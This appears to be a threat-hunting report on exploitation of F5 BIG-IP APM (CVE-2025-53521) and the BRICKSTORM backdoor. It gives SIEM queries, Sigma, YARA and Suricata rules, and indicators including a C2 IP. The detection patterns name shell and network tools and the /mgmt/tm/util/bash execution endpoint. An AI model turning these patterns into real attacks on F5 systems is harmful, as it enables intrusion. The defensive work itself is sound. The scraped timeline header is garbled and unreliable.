Resecurity, "F5 BIG-IP Source Code Leak Tied to BRICKSTORM Backdoor." https://www.resecurity.com/blog/article/f5-big-ip-source-code-leak-tied-to-state-linked-campaigns-using-brickstorm-backdoor
News4Hackers, "CVE-2025-53521 F5 BIG-IP APM Exploitation." https://www.news4hackers.com/big-ip-apm-remote-code-execution-vulnerability-exploited-by-attackers-cve-2025-53521

📊

Visual Intelligence

Timeline (4 events)

Oct 22, 2025

cyber

Conti

Mar 27, 2026

<cite index="1-10">CISA added CVE-2025-53521 to its Known Exploited Vulnerabilities catalog on March 27, 2026, giving Federal Civilian Executive Branch agencies until Monday, March 30 to apply fixes.

cyber

CISA

Mar 28, 2026

cyber

Mar 28, 2026

The Hacker News, "CISA Adds CVE-2025-53521 to KEV After Active F5 BIG-IP APM Exploitation," March 28, 2026. https://thehackernews.com/2026/03/cisa-adds-cve-2025-53521-to-kev-after.html 3.

cyber

CISA

Entity Graph (10 entities, 19 relationships)

cve organization malware country ip

Diamond Model

Adversary

Unknown

Capability

CVE-2025-53521 CVE-2023-46747 BRICKSTORM

Infrastructure

61.239.68.73

Victim

CISA Mandiant Socket Google

Relationships

victim → capability: affected_by (CISA, CVE-2025-53521)

capability → victim: targeted_by (BRICKSTORM, Socket)

---

Hunt Guide: Hunt Report: CVE-2025-53521 F5 BIG-IP APM Remote Code Execution

Confidence: High | Priority: Critical

Scope

Networks: All F5 BIG-IP APM appliances (versions 17.5.0-17.5.1, 17.1.0-17.1.2, 16.1.0-16.1.6, 15.1.0-15.1.10), particularly those with virtual servers exposed to untrusted networks
Timeframe: October 2025 to present (CVE was initially misclassified as DoS, actual RCE exploitation may have begun earlier)
Priority Systems: Internet-facing F5 BIG-IP APM devices, VPN concentrators, authentication gateways for healthcare/defense networks, any F5 device with access to sensitive internal resources

MITRE ATT&CK Techniques

T1190 — Exploit Public-Facing Application (Initial Access) [P1]

Exploitation of CVE-2025-53521 in F5 BIG-IP APM virtual servers for unauthenticated remote code execution

Splunk SPL:

index=f5_bigip OR index=network sourcetype=f5:bigip:asm:syslog OR sourcetype=f5:bigip:ltm:log | eval suspicious_uri=if(match(uri, "(?i)(eval|exec|system|shell|cmd|bash|powershell)"), 1, 0) | where suspicious_uri=1 OR http_status>=500 | stats count by src_ip, dest_ip, uri, http_status, _time | where count>10

Elastic KQL:

(source:"f5-bigip" OR tags:"f5") AND (http.response.status_code:>=500 OR url.path:(*eval* OR *exec* OR *system* OR *shell* OR *cmd* OR *bash*))

Sigma Rule:

title: F5 BIG-IP APM Exploitation Attempt
id: a7c4f8e2-3b91-4d5a-9c17-8e4f5d3a2b1c
status: experimental
description: Detects potential exploitation attempts against F5 BIG-IP APM
references:
  - https://www.helpnetsecurity.com/2026/03/28/big-ip-apm-vulnerability-cve-2025-53521-exploited/
author: PEAK Hunt Team
date: 2026/03/28
tags:
  - attack.initial_access
  - attack.t1190
  - cve.2025.53521
logsource:
  product: f5
  service: bigip
detection:
  selection_status:
    http_status:
      - 500
      - 502
      - 503
  selection_suspicious_uri:
    uri|contains:
      - 'eval'
      - 'exec'
      - 'system'
      - 'bash'
      - 'cmd'
  condition: selection_status or selection_suspicious_uri
falsepositives:
  - Legitimate administrative activity
  - Application errors
level: high

Monitor for HTTP 500 errors and suspicious URI patterns indicating command injection. Baseline normal APM traffic patterns to reduce false positives.

T1059 — Command and Scripting Interpreter (Execution) [P1]

Execution of bash commands via compromised F5 BIG-IP systems, particularly through /mgmt/tm/util/bash endpoint

Splunk SPL:

index=f5_bigip sourcetype=f5:bigip:audit OR sourcetype=f5:bigip:asm:syslog | search (uri="/mgmt/tm/util/bash" AND method="POST") OR (command="*bash*" OR command="*sh -c*" OR command="*/tmp/*") | table _time src_ip user command uri method | dedup src_ip

Elastic KQL:

(source:"f5-bigip-audit" OR tags:"f5-audit") AND (url.path:"/mgmt/tm/util/bash" OR process.command_line:(*bash* OR *sh -c* OR */tmp/*))

Sigma Rule:

title: F5 BIG-IP Suspicious Command Execution
id: b8d4f7e3-4c92-5e6b-0d28-9e5f6e4b3c2d
status: experimental
description: Detects suspicious command execution on F5 BIG-IP systems
references:
  - https://www.praetorian.com/blog/refresh-compromising-f5-big-ip-with-request-smuggling-cve-2023-46747/
author: PEAK Hunt Team
date: 2026/03/28
tags:
  - attack.execution
  - attack.t1059
logsource:
  product: f5
  service: audit
detection:
  selection_bash_endpoint:
    uri: '/mgmt/tm/util/bash'
    method: 'POST'
  selection_suspicious_commands:
    command|contains:
      - 'wget'
      - 'curl'
      - 'nc '
      - 'ncat'
      - '/tmp/'
      - 'base64'
      - 'python'
  condition: selection_bash_endpoint or selection_suspicious_commands
falsepositives:
  - Legitimate administrative scripts
level: high

Focus on commands executed through management API endpoints and any processes spawned from web service contexts

T1562.001 — Disable or Modify Tools (Defense Evasion) [P1]

Modification of sys-eicheck integrity checker and self-patching of vulnerabilities to prevent other actors

Splunk SPL:

index=f5_bigip sourcetype=f5:bigip:system OR sourcetype=linux_secure | search (file="*sys-eicheck*" OR process="*eicheck*" OR file="*mitigation.sh*") AND (action="modify" OR action="write" OR command="*chmod*" OR command="*chattr*") | stats count by file, process, user, src_ip | where user!="root" OR src_ip!="127.0.0.1"

Elastic KQL:

(source:"f5-bigip" OR system.auth.program:"sys-eicheck") AND (file.path:*sys-eicheck* OR process.name:*eicheck* OR file.name:"mitigation.sh") AND (event.action:("modify" OR "write" OR "chmod" OR "chattr"))

Alert on any modifications to sys-eicheck or unexpected execution of mitigation scripts from non-standard locations

T1136.001 — Create Account: Local Account (Persistence) [P1]

Creation of unauthorized administrative accounts on compromised F5 BIG-IP systems

Splunk SPL:

index=f5_bigip sourcetype=f5:bigip:audit | search (command="create" OR command="modify") AND (object_type="user" OR path="/auth/user/*") | regex user!="(admin|root|f5admin)" | table _time, src_ip, user, created_user, role | sort - _time

Elastic KQL:

(source:"f5-bigip-audit") AND (event.action:("create" OR "user-create" OR "user-add")) AND (object.type:"user" OR url.path:"/auth/user/*")

Baseline authorized admin accounts and alert on any new privileged user creation, especially from external IPs

T1071.001 — Application Layer Protocol: Web Protocols (Command and Control) [P2]

BRICKSTORM backdoor uses encrypted WebSocket connections for C2 communications

Splunk SPL:

index=network OR index=proxy | search (dest_ip="61.239.68.73" OR src_ip="61.239.68.73") OR (protocol="websocket" OR uri="*ws://*" OR uri="*wss://*") | stats count by src_ip, dest_ip, dest_port, protocol | where count>50

Elastic KQL:

(destination.ip:"61.239.68.73" OR source.ip:"61.239.68.73") OR (network.protocol:"websocket" OR url.scheme:("ws" OR "wss"))

Monitor for persistent WebSocket connections to unusual external IPs, especially from F5 appliances

T1105 — Ingress Tool Transfer (Command and Control) [P2]

Download of reconnaissance tools and malware to compromised systems, particularly to /tmp/ directory

Splunk SPL:

index=f5_bigip OR index=linux_secure | search (file="/tmp/*" AND (action="create" OR action="write")) OR (command="*wget*" OR command="*curl*" OR command="*scp*") | regex file!="\.(log|tmp|pid)$" | table _time, host, file, size, user, process | where size>1000

Elastic KQL:

(file.path:"/tmp/*" AND event.action:("creation" OR "write")) OR (process.command_line:(*wget* OR *curl* OR *scp*) AND NOT file.extension:("log" OR "tmp" OR "pid"))

Focus on executable files or scripts created in /tmp/, especially named 'ss' or containing Go/ELF binaries

Indicators of Compromise

Type	Value	Context
ip	`61.239.68.73`	Hong Kong IP associated with UNC5174 exploitation of CVE-2023-46747
filename	`/tmp/ss`	Reconnaissance tool downloaded to compromised F5 BIG-IP systems by UNC5174
filename	`mitigation.sh`	F5-provided mitigation script, but also used by UNC5174 to self-patch vulnerabilities
filename	`sys-eicheck`	BIG-IP system integrity checker targeted for modification by threat actors
filename	`Pg_update`	BRICKSTORM backdoor component used as system/update helper
filename	`Listener`	BRICKSTORM backdoor component for C2/socket handling
url	`/mgmt/tm/util/bash`	API endpoint for command execution when authentication is bypassed
url	`/tmui`	Handler code path for CVE-2023-46747 exploitation

IOC Sweep Queries (Splunk):

index=* (dest_ip="61.239.68.73" OR src_ip="61.239.68.73" OR query="61.239.68.73") | stats count by index, sourcetype, src_ip, dest_ip, dest_port | sort - count

index=* (file="/tmp/ss" OR filename="ss" OR process="/tmp/ss" OR command="*/tmp/ss*") | stats count by host, file, process, user | sort - count

index=* (file="*mitigation.sh" OR process="*mitigation.sh" OR command="*mitigation.sh*") | stats count by host, file, user, src_ip | sort - count

index=* (file="*sys-eicheck*" OR process="*sys-eicheck*" OR command="*eicheck*") | search action!="read" | stats count by host, file, action, user | sort - count

index=* (file="*Pg_update*" OR process="*Pg_update*" OR filename="Pg_update") | stats count by host, file, path, hash | sort - count

index=* (file="*Listener" OR process="*Listener" OR filename="Listener") | search file!="*.dll" AND file!="*.exe" | stats count by host, file, path, hash | sort - count

index=* (uri="/mgmt/tm/util/bash" OR url="*/mgmt/tm/util/bash" OR cs_uri_stem="/mgmt/tm/util/bash") | search method="POST" | stats count by src_ip, dest_ip, status, user_agent | sort - count

index=* (uri="/tmui*" OR url="*/tmui*" OR cs_uri_stem="/tmui*") | search status>=400 OR bytes_out>10000 | stats count by src_ip, uri, status, bytes_out | sort - count

YARA Rules

BRICKSTORM_Backdoor — Detects BRICKSTORM Go-based ELF backdoor components

rule BRICKSTORM_Backdoor {
    meta:
        description = "Detects BRICKSTORM backdoor components used in F5 BIG-IP exploitation"
        author = "PEAK Hunt Team"
        date = "2026-03-28"
        reference = "https://www.resecurity.com/blog/article/f5-big-ip-source-code-leak-tied-to-state-linked-campaigns-using-brickstorm-backdoor"
        hash1 = "unknown"
    
    strings:
        $s1 = "Pg_update" fullword ascii
        $s2 = "Listener" fullword ascii
        $s3 = "Vmprotect" fullword ascii
        $s4 = "/etc/sysconfig/" ascii
        $go1 = "Go build ID:" ascii
        $go2 = "runtime.gopanic" ascii
        $elf = { 7F 45 4C 46 }
        $websocket1 = "websocket" ascii
        $websocket2 = "ws://" ascii
        $websocket3 = "wss://" ascii
    
    condition:
        $elf at 0 and
        (
            2 of ($s*) or
            (1 of ($s*) and 2 of ($go*) and 1 of ($websocket*))
        )
}

F5_BIGIP_Exploitation_Artifacts — Detects artifacts of F5 BIG-IP exploitation including UNC5174 tools

rule F5_BIGIP_Exploitation_Artifacts {
    meta:
        description = "Detects artifacts from F5 BIG-IP exploitation campaigns"
        author = "PEAK Hunt Team"
        date = "2026-03-28"
        reference = "CVE-2025-53521, CVE-2023-46747"
    
    strings:
        $tool1 = "/tmp/ss" fullword ascii
        $tool2 = "SNOWLIGHT" ascii
        $tool3 = "GOREVERSE" ascii
        $tool4 = "GOHEAVY" ascii
        $tool5 = "SUPERSHELL" ascii
        $cmd1 = "tmsh list auth user" ascii
        $cmd2 = "/mgmt/tm/util/bash" ascii
        $cmd3 = "sys-eicheck" ascii
        $f5_1 = "BIG-IP" ascii nocase
        $f5_2 = "F5 Networks" ascii
        $exploit1 = "/tmui/" ascii
        $exploit2 = "Apache JServ Protocol" ascii
    
    condition:
        (
            any of ($tool*) or
            (2 of ($cmd*) and 1 of ($f5_*)) or
            (1 of ($exploit*) and 1 of ($f5_*))
        )
}

Suricata Rules

SID 1000001 — Detects potential CVE-2025-53521 F5 BIG-IP APM exploitation attempt

alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT F5 BIG-IP APM CVE-2025-53521 Exploitation Attempt"; flow:established,to_server; content:"POST"; http_method; content:"/mgmt/tm/util/bash"; http_uri; content:"command"; http_client_body; depth:20; reference:cve,2025-53521; classtype:attempted-admin; sid:1000001; rev:1;)

SID 1000002 — Detects connection to UNC5174 C2 infrastructure

alert ip any any -> 61.239.68.73 any (msg:"ET MALWARE UNC5174 C2 Communication to Known Bad IP"; reference:url,cloud.google.com/blog/topics/threat-intelligence/initial-access-brokers-exploit-f5-screenconnect; classtype:trojan-activity; sid:1000002; rev:1;)

SID 1000003 — Detects F5 BIG-IP TMUI exploitation via CVE-2023-46747

alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT F5 BIG-IP TMUI CVE-2023-46747 Request Smuggling Attempt"; flow:established,to_server; content:"/tmui/"; http_uri; content:"Content-Length:"; http_header; pcre:"/Content-Length:\s*[0-9]+[\r\n]+.*Content-Length:/smi"; reference:cve,2023-46747; classtype:web-application-attack; sid:1000003; rev:1;)

SID 1000004 — Detects BRICKSTORM backdoor WebSocket communication

alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"ET MALWARE BRICKSTORM Backdoor WebSocket C2 Communication"; flow:established,to_server; content:"GET"; depth:4; content:"Upgrade|3a 20|websocket"; http_header; content:"Connection|3a 20|Upgrade"; http_header; content:"Sec-WebSocket"; http_header; threshold:type limit,track by_src,count 1,seconds 3600; reference:url,resecurity.com/blog/article/f5-big-ip-source-code-leak-tied-to-state-linked-campaigns-using-brickstorm-backdoor; classtype:trojan-activity; sid:1000004; rev:1;)

Data Source Requirements

Source	Required For	Notes
F5 BIG-IP logs	T1190, T1059, T1562.001, T1136.001	Enable audit logging and ASM security logging on all F5 devices. Configure remote syslog to SIEM.
Network traffic logs	T1190, T1071.001, T1105	Full packet capture or NetFlow/IPFIX data for F5 management and data plane interfaces
DNS logs	T1071.001	DNS query logging to detect C2 domain resolution
File integrity monitoring	T1562.001, T1105	Monitor /tmp/, /etc/sysconfig/, and F5 system directories for unauthorized changes
Process execution logs	T1059, T1105	Linux auditd or equivalent on F5 appliances to capture command execution

Sources

Found this useful?

Related Reports

Threat IntelApril 10, 2026